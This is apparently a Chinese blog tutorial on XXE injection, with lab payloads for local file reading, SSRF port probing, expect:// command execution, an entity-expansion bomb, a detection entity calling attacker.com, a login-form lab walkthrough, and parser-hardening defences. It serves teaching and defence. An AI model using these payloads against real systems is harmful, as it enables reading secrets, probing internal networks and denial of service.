XXE漏洞攻击方法

原创 于 2025-09-04 14:07:01 发布 · 889 阅读 · 6 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络安全

一、XXE 漏洞的概念

  • XXE 全称:XML External Entity Injection(XML 外部实体注入)

  • 本质
    在解析 XML 时,如果允许定义并解析外部实体,攻击者就可以构造恶意实体来:

    • 读取任意文件

    • 发起 HTTP/FTP 请求(SSRF)

    • 探测内网端口

    • 执行系统命令(依赖扩展)

    • 发起拒绝服务攻击(XML 炸弹)

 核心点:解析器支持 DTD,且外部实体未被禁用

二、XML 与实体复习

1. 内部实体

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE test [ 
    <!ENTITY hacker "rastest"> 
]> 
<data>&hacker;</data>

  • 结果&hacker; 被替换成rastest

  • 用途:像变量一样的替换机制。

2. 外部实体

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ 
    <!ENTITY xxe SYSTEM "file:///C:/secret.txt"> 
]> 
<data>&xxe;</data>

  • 结果:解析时尝试读取 C:/secret.txt 文件内容并替换 &xxe;

  • 如果服务端直接输出 → 任意文件读取。

三、XXE 漏洞的危害

  1. 任意文件读取

    • 读取系统配置文件、数据库配置、密码等敏感信息。

  2. SSRF(服务器端请求伪造)

    • 利用 http:// 协议访问内网服务或外部接口。

    • 可探测端口是否开放。

  3. 命令执行

    • 在支持 expect:// 协议的环境下执行系统命令。

  4. 拒绝服务(DoS)

    • “Billion Laughs Attack” 递归实体,消耗 CPU/内存。

四、实验代码分析

实验文件:xxe.php

  • 功能:接收用户输入 → 解析成 XML → 输出解析结果。

1. 内部实体实验

输入 XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ 
    <!ENTITY hacker "rastest">
]> 
<data>&hacker;</data>

  • 结果:浏览器输出 rastest

  • 证明:解析器支持实体替换。

2. 外部实体实验

构造 XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ 
    <!ENTITY xxe SYSTEM "file:///E:/in.txt"> 
]> 
<data>&xxe;</data>

  • 如果 E:/in.txt 内容是 “三连”

  • 结果:输出 三连”

  • 证明:存在 XXE → 任意文件读取。

3. SSRF + 端口探测实验

构造 XML:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE test [ 
    <!ENTITY xxe SYSTEM "http://127.0.0.1:3306/"> 
]> 
<data>&xxe;</data>

  • 如果 3306 端口 MySQL 服务开放 → 请求成功

  • 如果改为 3307(未启用) → 请求失败,报错 failed to load

  • 结果:实现了端口扫描/探测。

4. 命令执行实验(需要 PHP expect 扩展)

<!DOCTYPE test [ 
    <!ENTITY xxe SYSTEM "expect://id"> 
]> 
<data>&xxe;</data>

  • 结果:可执行系统命令,如 ipconfigid 等。

5. DoS 攻击(XML 炸弹)

<!DOCTYPE lolz [ 
    <!ENTITY lol "lol"> 
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> 
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;"> 
]> 
<data>&lol2;</data>

  • 实体递归膨胀,占用大量内存 → 造成拒绝服务。

五、实战案例:微信支付 XXE 漏洞

  • 背景:2018 年微信支付 Java SDK 被爆存在 XXE 漏洞

  • 原因

    • 商户接收微信异步通知时,使用 XML 解析器未禁用外部实体。

  • 影响

    • 攻击者可通过回调 XML 注入外部实体 → 任意文件读取(如商户 ID、API key)

    • 导致“零元购”等严重风险。

  • 官方态度

    • 微信称问题在商户端代码 → 解析器配置不当。

六、XXE 漏洞检测方法

  1. 前提:系统确实使用 XML 进行数据传输。

  2. 构造测试:在 XML 中插入外部实体,例如:

<!DOCTYPE test [ 
<!ENTITY test SYSTEM "http://attacker.com/test"> 
]> 
<data>&test;</data>

  1. 观察

    • 如果 attacker.com 收到请求 → 存在 XXE。

    • 可用 DNSlog 平台 或自建服务器收集请求。

七、防御措施

  1. 禁用外部实体解析(核心)

    • PHP:libxml_disable_entity_loader(true);

    • Java:

      factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 
factory.setFeature("http://xml.org/sax/features/external-general-entities", false); 
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

  2. 使用安全的 XML 解析库(如 defusedxml

  3. 最小化权限:解析器进程不要有高权限

  4. 严格过滤输入:白名单机制

八、登录口靶场渗透测试思路

靶场登录口通信使用 XML,攻击思路如下:

  1. 确认传输格式

    • 抓包(BurpSuite) → 确认登录请求体是 XML 格式:

      <user> 
    <username>test</username> 
    <password>123</password> 
</user>

  2. 插入外部实体

    • 在 XML 开头添加 DTD,引用本地文件:

      <!DOCTYPE foo [ 
<!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini"> 
]> 
<user> 
    <username>&xxe;</username> 
    <password>123</password>
 </user>

  3. 结果

    • 如果响应包中包含 system.ini 内容 → 任意文件读取漏洞成立。

  4. 可扩展攻击

    • 替换实体内容为 http:// → SSRF

    • 用 DNSlog → 无回显检测

    • 用 expect:// → 命令执行(环境允许时)

    • 用递归实体 → DoS

XXE(xml外部实体攻击)
HoYim
04-11 4653
1、概念 XXEXML External Entity)是指xml外部实体攻击漏洞XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
XML外部实体注入(XML External Entity,XXE漏洞详解
weixin_42489549的博客
02-11 1391
XML外部实体注入(XXE)是一种安全漏洞攻击者通过利用XML解析器对外部实体的处理机制,读取本地文件、探测内网资源、执行远程请求,甚至触发拒绝服务攻击(DoS)。XXE漏洞通常出现在应用程序解析用户提供的XML输入且未禁用外部实体加载时。
3种XXE不同攻击方式,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
06-18 501
XML外部实体(XXE)注入是一个严重的缺陷,允许攻击者读取服务器上的本地文件,访问内部网络,扫描内部端口或在远程服务器上执行命令。它针对解析XML的应用程序。当包含对外部实体的引用的XML输入由弱配置的XML解析器处理时,会发生此攻击攻击者通过在XML数据中嵌入恶意内联DOCTYPE定义来利用它。当Web服务器处理恶意XML输入时,实体将被扩展,这可能会导致攻击者访问Web服务器的文件系统,远程文件系统访问或通过HTTP/HTTPS建立与任意主机的连接。
XXE漏洞详解
不忘初心,护天下安全!
08-09 1836
XXE XXEXML External Entity,XML外部实体注入),这种漏洞出现一般出现在当前站点允许引用外部实体的情况下,如果攻击者构造恶意内容,就可以造成命令执行、内网端口探测等危害,如果和ssrf攻击结合,那场面那效果,如虎添翼一般。 XMLXXE的明明也可以看得出来,XML是我们必须了解的东西。XML指可扩展标记语言,用于标记电子文件使其具有结构性。通俗来说,xml就是...
Xml实体注入漏洞的一些测试和总结
Arno2013的专栏
02-01 6943
Xml实体注入漏洞的一些总结 1、 xml实体注入原理 <!-- 引入外部DTD,也可以包含文件,不过并不能读取全部信息 --> <!DOCTYPE root[ ]> &arno; is readed from read.txt &boot; is readed from file &xxx;表示xxx是xml的一个实体,其值为xml
微信支付回调,XXE攻击漏洞防止方法
dianhuoshu1349的博客
07-06 528
最近微信支付回调发现的XXE攻击漏洞(什么是XXE攻击,度娘、bing去搜,一搜一大把),收到通知后即检查代码, 微信给的解决方法是如果你使用的是: XmlDocument: XmlDocument xd = new XmlDocument { XmlResolver = null, }; 我们做微信支付没有使用他们的SDK,底层解析XML没有使用XmlD...
[Web安全 网络安全]-XXE外部实体注入攻击XML
刘鑫磊
09-28 1692
XXE-XML外部实体注入攻击
Chapter10-XXE
qq_43200562的博客
06-14 1082
XML external entity injection,XXE是一个Web安全漏洞,允许攻击者干扰应用程序对XML数据的处理。它通常允许攻击者查看应用服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。(即,实现类似于SSRF的内网探测和任意文件读取)在某些情况下,攻击者可以利用XXE漏洞执行服务器端请求伪造(SSRF)攻击,从而升级XXE攻击,危及底层服务器或其他后端架构。XML代表“可扩展标记语言”。XML是一种为存储和传输数据而设计的语言。
XXE 漏洞介绍
ttyy1112的专栏
03-24 1086
是一种针对 XML 解析器的漏洞攻击者可以利用它读取服务器上的文件、发起 SSRF 攻击或导致拒绝服务(DoS)。XXE 漏洞通常发生在应用程序解析用户提供的 XML 数据时,未禁用外部实体引用。XXE 漏洞的危害性较大,可能导致文件读取、SSRF 攻击或拒绝服务。通过禁用外部实体、使用安全的 XML 解析器、验证用户输入等方法,可以有效防止 XXE 漏洞。同时,结合日志监控和文件访问限制,可以进一步增强安全性。
xxe漏洞原理与利用
Au_Wind的博客
03-03 2120
xxe漏洞原理与应用
网络安全筑基篇——XSS、XMLXXE
weixin_55762309的博客
07-10 1327
XSS、XXEXML的区别
XXE漏洞
m0_48294281的博客
11-21 1179
XXEXML External Entity)漏洞是一种安全漏洞,通常出现在处理XML输入的应用程序中。它允许攻击者通过注入恶意XML内容,利用外部实体的解析能力,来访问敏感文件、执行拒绝服务攻击或进行其他恶意操作。
XXE漏洞详解与利用
qq_56438857的博客
08-11 8147
XML(Extensible Markup Language)意为可扩展性标记语言,我将介绍下 XML 的一些基础知识,方便你更好地理解漏洞原理。
XXE初探
China_I_LOVE的博客
11-06 956
XML代表“可扩展标记语言”。XML 是一种设计用于存储和传输数据的语言。与 HTML 一样,XML 使用标记和数据的树状结构。与 HTML 不同,XML 不使用预定义的标记,因此可以为标记指定描述数据的名称。在 Web 历史的早期,XML 作为一种数据传输格式很流行(“AJAX”中的“X”代表“XML”)。但它的受欢迎程度现在已经下降,取而代之的是 JSON 格式。XML 实体是一种表示 XML 文档中数据项的方式,而不是使用数据本身。各种实体都内置在 XML 语言的规范中。例如,实体和表示字符和。
网络安全】什么是XXE?从0到1完全掌握XXE
HBohan的博客
04-28 5651
前置知识 XML 定义实体 XML 实体允许定义在分析 XML 文档时将由内容替换的标记,这里我的理解就是定义变量,然后赋值的意思一致。就比如一些文件上传的 payload 中就会有。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 <?xml version="1.0"?>//这一行是 XML 文档定义 <!DOCTYPE message [ <!ELEMENT messa
【Academy】XML 外部实体 (XXE) 注入 ------ XML external entity (XXE) injection
D-river博客
03-12 1324
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以通过利用 XXE 漏洞执行服务器端请求伪造 (SSRF) 攻击,升级 XXE 攻击以破坏底层服务器或其他后端基础设施。XML 代表 “可扩展标记语言”。XML 是一种用于存储和传输数据的语言。与 HTML 一样,XML 使用标签和数据的树状结构。
XXE漏洞:原理、危害与修复方法详解
C_V_Better的博客
02-26 1561
XXEXML External Entity Injection)漏洞,即XML外部实体注入漏洞。当服务器端解析XML允许外部实体加载时,攻击者在请求中插入的恶意XML外部实体被服务器端加载解析,从而导致任意文件读取、探测内网、执行系统命令等安全问题。XXE漏洞是一种严重的安全漏洞,可能导致任意文件读取、命令执行、拒绝服务攻击和SSRF攻击等危害。通过禁用外部实体、严格输入验证和过滤、安全配置服务器以及升级解析器版本等方法,可以有效防止XXE漏洞的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值